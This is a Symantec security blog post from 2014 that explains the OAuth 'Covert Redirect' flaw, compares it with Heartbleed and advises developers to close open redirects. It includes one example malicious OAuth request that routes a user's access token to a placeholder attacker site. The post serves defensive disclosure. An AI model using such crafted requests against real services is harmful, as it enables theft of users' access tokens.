Video Screencast Help
Protect Your POS Environment Against Retail Data Breaches. Learn More.
Security Response

Covert Redirect Flaw in OAuth is Not the Next Heartbleed

Created: 03 May 2014 01:13:32 GMT • Updated: 12 Sep 2014 17:35:41 GMT • Translations available: 日本語
Symantec Security Response's picture
+3 3 Votes
Login to vote

Coming off the heels of the Heartbleed bug, a new report on a security flaw called “Covert Redirect” is garnering a lot of media attention—so much that some outlets are referring to it as the next Heartbleed. But is Covert Redirect as bad as Heartbleed? Definitely not.

Is this the next Heartbleed?
No, it is not. This is a security flaw in the implementation of OAuth by service providers.

Why is Covert Redirect not as bad as Heartbleed?
Heartbleed is a serious vulnerability within OpenSSL, an open source implementation of the SSL and TLS cryptographic protocols used by over a half a million websites. The Heartbleed vulnerability could be exploited just by issuing requests to unpatched servers. Covert Redirect, however, requires an attacker to find a susceptible application as well as acquire interaction and permissions from users.

What is Covert Redirect?
Covert Redirect is a security flaw, not a vulnerability. It takes advantage of third-party clients susceptible to an open redirect.

For example, an attacker could covertly issue a request to a service provider's API using a susceptible site's app and modify the redirect_uri parameter. The new modified redirect_uri parameter maliciously redirects users after they have successfully authenticated.

Standard Request: [PROVIDER]/dialog/oauth?redirect_uri=[SUSCEPTIBLE SITE]&scope=email&client_id=123&response_type=token

Malicious Request: [PROVIDER]/dialog/oauth?redirect_uri=[SUSCEPTIBLE SITE]/redirectKeepParams?w=1dpoa&url=[ATTACKER SITE]&scope=email&client_id=123&response_type=token

In a malicious request, the attacker receives the user's access token,the approved application does not.

What is OAuth?
OAuth is an open protocol to allow secure authorization from web, mobile and desktop applications. When using OAuth—like a “Login with Facebook” button—OAuth is the authorizing mechanism and enables third-party applications to obtain access to user accounts.

What is the risk to users?
For this flaw to be exploited, it requires interaction from users. A user would have to grant permissions to a susceptible application in order for the access token to be compromised. An attacker may then obtain user account data which could be used for further malicious purposes.

What is the impact to application developers?
If there is an open redirect on your website, an attacker could target your application for Covert Redirect. It is important to lock down open redirects on your website. Service providers also recommend application developers create a whitelist of OAuth redirect URLs.

What is the next step?
While Covert Redirect is a notable security flaw, it is not on the same level as Heartbleed. Covert Redirect serves as a reminder to be careful about what applications you grant access to.

Do not expect a patch—it is up to the service providers to secure their own implementations to effectively address the Covert Redirect flaw.